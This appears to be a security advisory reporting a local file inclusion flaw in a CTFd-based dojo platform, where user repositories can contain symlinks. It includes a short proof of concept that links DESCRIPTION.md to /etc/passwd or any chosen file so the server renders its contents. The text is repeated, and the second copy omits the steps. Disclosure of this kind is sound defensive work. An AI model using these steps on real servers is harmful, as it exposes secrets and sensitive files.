Summary
Incorrect symlink checks on user specified dojos allows for users (admin not required) to perform an LFI from the CTFd container.
Details
When a user clones or updates repositories, a check is performed to see if the repository had contained any symlinks. A malicious user could craft a repository with symlinks pointed to sensitive files and then retrieve them using the CTFd website.
PoC
Start from an empty directory.
- $ git init
- Create a dojo.yml file (https://github.com/pwncollege/example-dojo/blob/main/dojo.yml works fine but I removed the modules)
- $ ln -s /etc/passwd DESCRIPTION.md
NOTE: In the above step, /etc/passwd can be replaced with any file of your choosing
- Commit and push the dojo.yml and DESCRIPTION.md to a GitHub repo
- Create a dojo from that GitHub repo
- Navigate to the main page of the new dojo
- See file contents
Impact
This is an LFI where the server secrets and other sensitive files could be exposed.
cjreed121 Reporter
Summary
Incorrect symlink checks on user specified dojos allows for users (admin not required) to perform an LFI from the CTFd container.
Details
When a user clones or updates repositories, a check is performed to see if the repository had contained any symlinks. A malicious user could craft a repository with symlinks pointed to sensitive files and then retrieve them using the CTFd website.
PoC
Start from an empty directory.
NOTE: In the above step, /etc/passwd can be replaced with any file of your choosing
Impact
This is an LFI where the server secrets and other sensitive files could be exposed.